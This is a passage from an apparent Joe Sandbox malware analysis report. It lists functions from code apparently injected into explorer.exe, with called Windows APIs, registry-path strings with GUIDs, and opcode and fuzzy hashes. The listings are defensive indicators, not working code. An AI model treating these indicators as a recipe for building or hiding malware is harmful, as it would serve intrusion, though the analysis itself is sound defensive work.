                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 2168760479-1494669752
                          • Opcode ID: 939a899e7ea8db28a757730d9663b4bab80499fce987b8791b7c3842192692b5
                          • Instruction ID: 49ec6aeff1644f9fd051ed3c0074d58d62b03d0ed00b4af21824c93beae65697
                          • Opcode Fuzzy Hash: 939a899e7ea8db28a757730d9663b4bab80499fce987b8791b7c3842192692b5
                          • Instruction Fuzzy Hash: 5A114075224A8596EB58DF25F8547DE73A0F785B84F804125A79A83BA8DF7CC106CB40
                          APIs
                          • LocalAlloc.KERNEL32 ref: 0119778A
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 011977FC
                          • LocalFree.KERNEL32 ref: 01197820
                          Strings
                          • {F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}, xrefs: 011977A1
                          • {B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}, xrefs: 011977E9
                          • SOFTWARE\%s, xrefs: 011977A8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 3172112264-3335224962
                          • Opcode ID: 4a1286ad05cb3682face972baaa7493cd4c3cd92e28d625ee39da449b929514c
                          • Instruction ID: 7573a13bc64419cb817599b0d3a5ad2e6f161bcde55623cad04d2851442a64ad
                          • Opcode Fuzzy Hash: 4a1286ad05cb3682face972baaa7493cd4c3cd92e28d625ee39da449b929514c
                          • Instruction Fuzzy Hash: D111F331218B8582EB58DB54F4483DAB3B4F785758FA00229E79D87BA8DF7DC54ACB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                          • API String ID: 667068680-1459209654
                          • Opcode ID: 99c34056dace75a87c6772c8f9530ccf68f2bd4aaada53c51aa2ff5587048d9e
                          • Instruction ID: 2409bea6a0dd9b8cd4fcfd8ff5587ba654fe15755245f1de06b99da26104feb7
                          • Opcode Fuzzy Hash: 99c34056dace75a87c6772c8f9530ccf68f2bd4aaada53c51aa2ff5587048d9e
                          • Instruction Fuzzy Hash: E3F0A435954F5882E72D9B18F8983E537A0F794748F8445269B8A82274EF7CC29AC681
                          APIs
                          • _getptd.LIBCMT ref: 011BB103
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                            • Part of subcall function 011BC4E0: _getptd.LIBCMT ref: 011BC4E4
                          • _getptd.LIBCMT ref: 011BB115
                          • _getptd.LIBCMT ref: 011BB123
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$_amsg_exit
                          • String ID: MOC$RCC$csm
                          • API String ID: 2610988583-2671469338
                          • Opcode ID: 9b1d25e41cb6f60ff9d10fea1865af2b516c1639544035d129adf6bb36f99700
                          • Instruction ID: a2814bf7033c923ab444bac8d543a65391a07bf2c6fa4951ee4c9c13dcaab320
                          • Opcode Fuzzy Hash: 9b1d25e41cb6f60ff9d10fea1865af2b516c1639544035d129adf6bb36f99700
                          • Instruction Fuzzy Hash: 7EE01A3AA04106CAD72E6B69E0853EC36A1FFA8B0BF86D061C25443700C7BC8580CA66
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 2302018356-0
                          • Opcode ID: f49430829550468032db8019027c05be34a64d79151aecb5546c78de584d337c
                          • Instruction ID: e6ba5c277c94026cad34255658b413760d5742e2cb6160e8e9789cdc2ec0a1d3
                          • Opcode Fuzzy Hash: f49430829550468032db8019027c05be34a64d79151aecb5546c78de584d337c
                          • Instruction Fuzzy Hash: 8FE1E276209B80C6EB68CB18F4D53EAB7A0F794704F55012AD79E86BA4EB7CC147CB41
                          APIs
                          • _getptd.LIBCMT ref: 011BDF27
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                            • Part of subcall function 011BDB44: _getptd.LIBCMT ref: 011BDB4E
                            • Part of subcall function 011BDB44: _amsg_exit.LIBCMT ref: 011BDBEB
                            • Part of subcall function 011BDC00: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,011BDF42,?,?,?,?,?,011BE0FF), ref: 011BDC2A
                            • Part of subcall function 011C06CC: malloc.LIBCMT ref: 011C06F7
                            • Part of subcall function 011C06CC: Sleep.KERNEL32(?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C), ref: 011C070A
                          • free.LIBCMT ref: 011BDFB2
                            • Part of subcall function 011BC600: RtlFreeHeap.NTDLL(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC616
                            • Part of subcall function 011BC600: _errno.LIBCMT ref: 011BC620
                            • Part of subcall function 011BC600: GetLastError.KERNEL32(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC628
                          • _lock.LIBCMT ref: 011BDFE2
                          • free.LIBCMT ref: 011BE085
                          • free.LIBCMT ref: 011BE0B1
                          • _errno.LIBCMT ref: 011BE0B6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                          • String ID:
                          • API String ID: 3894533514-0
                          • Opcode ID: 73e5fff96fc2ff2ac652b7bf0c36a42a1b1abcda39ba731aff748bc9adf327a5
                          • Instruction ID: 928c58faa11619feaf253ddb8e7c857bf3fed03b0c6e32ccc422f72af1a3858d
                          • Opcode Fuzzy Hash: 73e5fff96fc2ff2ac652b7bf0c36a42a1b1abcda39ba731aff748bc9adf327a5
                          • Instruction Fuzzy Hash: 4F41F03230568186EB1D9F25E4C03EEBBA1F794B88F18812ACB5A47365CF7DD442C751
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF2BD
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF314
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF34F
                          • free.LIBCMT ref: 011BF35C
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF367
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF375
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                          • String ID:
                          • API String ID: 517548149-0
                          • Opcode ID: 563162d2e5260f89e2bfbf515d72d6f960428c1aed3f702d6255aeff5e47df9e
                          • Instruction ID: b479a2ae720b8a3c34485e75ce9e82b77fe2ea351c58702e59df18209982bc2b
                          • Opcode Fuzzy Hash: 563162d2e5260f89e2bfbf515d72d6f960428c1aed3f702d6255aeff5e47df9e
                          • Instruction Fuzzy Hash: 39219536609B8186EB289F26F8947ADB7A5F789FD0F484014DF8A07B68DF38C051C704
                          APIs
                            • Part of subcall function 011994B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994C7
                            • Part of subcall function 011994B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994F1
                            • Part of subcall function 011994B0: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199522
                            • Part of subcall function 011994B0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199535
                            • Part of subcall function 011994B0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 0119958D
                            • Part of subcall function 011994B0: CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199598
                          • GetFileAttributesW.KERNEL32 ref: 01199428
                          • LocalFree.KERNEL32 ref: 0119943E
                          • _LDint.LIBCPMTD ref: 01199454
                          • GetFileAttributesW.KERNEL32 ref: 01199475
                          • LocalFree.KERNEL32 ref: 0119948B
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocAttributesFile$DintFolderKnownPathTasklstrlen
                          • String ID:
                          • API String ID: 648754141-0
                          • Opcode ID: 92975d3bb36ba0aeba0f1b4d3f486a6c4df3aa1619a9ce175c1827031b21ed49
                          • Instruction ID: a79a482bcf2fb0fa2dca7ce644399299365b40ab355d9acf0684602cc7b50f4f
                          • Opcode Fuzzy Hash: 92975d3bb36ba0aeba0f1b4d3f486a6c4df3aa1619a9ce175c1827031b21ed49
                          • Instruction Fuzzy Hash: 0511BA72128A48C6EB29AF14E58439E77A0F7C875DF401629E6DE87768CF7DC185CB01
                          APIs
                          • GetLastError.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD1E
                          • FlsGetValue.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD2C
                          • SetLastError.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD84
                            • Part of subcall function 011C074C: Sleep.KERNEL32(?,?,00000000,011BAD47,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011C0791
                          • FlsSetValue.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD58
                          • free.LIBCMT ref: 011BAD7B
                            • Part of subcall function 011BAC5C: _lock.LIBCMT ref: 011BACB0
                            • Part of subcall function 011BAC5C: _lock.LIBCMT ref: 011BACCF
                          • GetCurrentThreadId.KERNEL32 ref: 011BAD6C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                          • String ID:
                          • API String ID: 3106088686-0
                          • Opcode ID: 8c2eb824bbaec741b9fcf627379a17a0dfd026b0b42dc5b97bdda3fb3bb86d54
                          • Instruction ID: b44352471d23c770c0c69c64c7aba0ebacf59dfc5311abfcdb97d6cca7a046c6
                          • Opcode Fuzzy Hash: 8c2eb824bbaec741b9fcf627379a17a0dfd026b0b42dc5b97bdda3fb3bb86d54
                          • Instruction Fuzzy Hash: 55016235201B4187EB0DAF65E8D83E86262EF88BA9F084228CA2A03390EF3CD445C610
                          APIs
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • _LDint.LIBCPMTD ref: 011A773B
                          • GetFileAttributesW.KERNEL32 ref: 011A775C
                          • LocalFree.KERNEL32 ref: 011A776C
                          • LocalFree.KERNEL32 ref: 011A7777
                          • LocalFree.KERNEL32 ref: 011A7789
                          • LocalFree.KERNEL32 ref: 011A7794
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Allocwnsprintf$AttributesDintFile
                          • String ID:
                          • API String ID: 3933031913-0
                          • Opcode ID: 5a3f21046453fb594ac3c22c22ea46263e7262b2553866b0b6947fcfb57de3b6
                          • Instruction ID: 4a0d7451d04d12ccc6baab982e25b4d8b871113a4ea761344aa72ca8ef3c1426
                          • Opcode Fuzzy Hash: 5a3f21046453fb594ac3c22c22ea46263e7262b2553866b0b6947fcfb57de3b6
                          • Instruction Fuzzy Hash: D901A176128E4482D768EF25E89439A7771F7C8798F400625E69E87668CF7DC685CF00
                          APIs
                          • _getptd.LIBCMT ref: 011BB9BD
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          • _getptd.LIBCMT ref: 011BB9DB
                          • _CallSETranslator.LIBCMT ref: 011BBA23
                            • Part of subcall function 011B88B8: _getptd.LIBCMT ref: 011B88DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CallTranslator_amsg_exit
                          • String ID: MOC$RCC
                          • API String ID: 1374396951-2084237596
                          • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                          • Instruction ID: b56089953b6927eaecb7f7e4673625f74b5c9bc653a3ddc5d9b48d7837f00c35
                          • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                          • Instruction Fuzzy Hash: 9951BD72608AC19ACF38DB19E5D07EDB760FB81B89F494526CB8E47A18DB78C152C704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                          • String ID: d
                          • API String ID: 1024630845-2564639436
                          • Opcode ID: 5ab9eb568d4970431e599d71f77821e3a37296d5731ef130ea2c4c62f91cd5f7
                          • Instruction ID: ec013a65c008e2823bcef2bdf9d15e50286d087c3ad3cf1f5f3286024b895580
                          • Opcode Fuzzy Hash: 5ab9eb568d4970431e599d71f77821e3a37296d5731ef130ea2c4c62f91cd5f7
                          • Instruction Fuzzy Hash: D251EA32308A8181EEB8CB48F4E57F5A361E7E4705F821626D68E86BA5EF7CC1958744
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 971639600-2564639436
                          • Opcode ID: 8552a47e95c20424504c3f48d4cec9fa28fd12cd46a885d93aa6cb29f0a44e10
                          • Instruction ID: 81f010009b82bd3d3e4663b1a2758240d005b6ab37bb9fcbfa098949a95678d9
                          • Opcode Fuzzy Hash: 8552a47e95c20424504c3f48d4cec9fa28fd12cd46a885d93aa6cb29f0a44e10
                          • Instruction Fuzzy Hash: 3E51DA72308E8081EEB8DB49F4E53F56361EBE4701F821626968EC6BA4EF7CC1958644
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 971639600-2564639436
                          • Opcode ID: 4ed1b81e74a60f9e53a3f8c8e5f8ff9de3f1677f8acc2fe881c829a5b2298539
                          • Instruction ID: 10e5887adb066c7fe8bf2eb3c7388e12bbd1ad3c6dbe26ae27bd79386108f9c3
                          • Opcode Fuzzy Hash: 4ed1b81e74a60f9e53a3f8c8e5f8ff9de3f1677f8acc2fe881c829a5b2298539
                          • Instruction Fuzzy Hash: 3D41BC32305A0081EE78DB49F8E97B5A3A1F7E8B05F421627A64EC67A4EF3CC6558704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$ExceptionRaise_amsg_exit
                          • String ID: csm
                          • API String ID: 4155239085-1018135373
                          • Opcode ID: e766e2aea064d0c1b3562efb748056da3fd218119ac93273f2242a5b12794b9b
                          • Instruction ID: ff15641e82727dc38842c992366a5fe7bf5e17d9319209c08f095f795b4ceff4
                          • Opcode Fuzzy Hash: e766e2aea064d0c1b3562efb748056da3fd218119ac93273f2242a5b12794b9b
                          • Instruction Fuzzy Hash: 51217E36204741C7DA39DF16E08079EB761FB99B65F414226CF9A03B94CB39D586CB05
                          APIs
                          • _callnewh.LIBCMT ref: 011B903E
                          • malloc.LIBCMT ref: 011B904A
                            • Part of subcall function 011BC7A8: _FF_MSGBANNER.LIBCMT ref: 011BC7D8
                            • Part of subcall function 011BC7A8: HeapAlloc.KERNEL32(?,?,?,011C06FC,?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5), ref: 011BC7FD
                            • Part of subcall function 011BC7A8: _callnewh.LIBCMT ref: 011BC816
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC821
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC82C
                          • std::exception::exception.LIBCMT ref: 011B90B7
                          • type_info::_Type_info_dtor.LIBCMT ref: 011B90ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _callnewh_errno$AllocHeapType_info_dtormallocstd::exception::exceptiontype_info::_
                          • String ID: bad allocation
                          • API String ID: 1736788397-2104205924
                          • Opcode ID: c96244e9f482b777b6cf6b46924f9183bb55c1782275ffe7a1cfa5c86aa232a5
                          • Instruction ID: 13a3fa40f9b82cceedd4d644f7478e2a24f198967065db269ec838d45e6fa0b4
                          • Opcode Fuzzy Hash: c96244e9f482b777b6cf6b46924f9183bb55c1782275ffe7a1cfa5c86aa232a5
                          • Instruction Fuzzy Hash: 17117971654B4A91EB1CEB15F8D03E863A9EB68788F484125DB8D03764EB7DC286C780
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 01198FC8
                          • LocalAlloc.KERNEL32 ref: 01198FE1
                          • RegGetValueW.ADVAPI32 ref: 01199034
                          • LocalFree.KERNEL32 ref: 01199058
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalValue$AllocFree_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s
                          • API String ID: 2638254995-297323700
                          • Opcode ID: a64576311c8b5d010abe15348bb567eed2cf1542a55aacb7b3dbe93d89b8c603
                          • Instruction ID: c13882084957849b9f30baa661a67915ad70851b74a3814c910d6e3629574877
                          • Opcode Fuzzy Hash: a64576311c8b5d010abe15348bb567eed2cf1542a55aacb7b3dbe93d89b8c603
                          • Instruction Fuzzy Hash: 74212A32208B8482EB249B59F49479EB7B4F785798F500229EBDD47BA8DF7EC145CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProcVersion
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2685220120-196638859
                          • Opcode ID: d8a7b21e71a6d189ec4ae80e8a695536de4575df490812d44e91965eea720e90
                          • Instruction ID: 83c3eac6ed790b71bff54f24c67163d03fa7524c8fe5811e62bbd2b434f13484
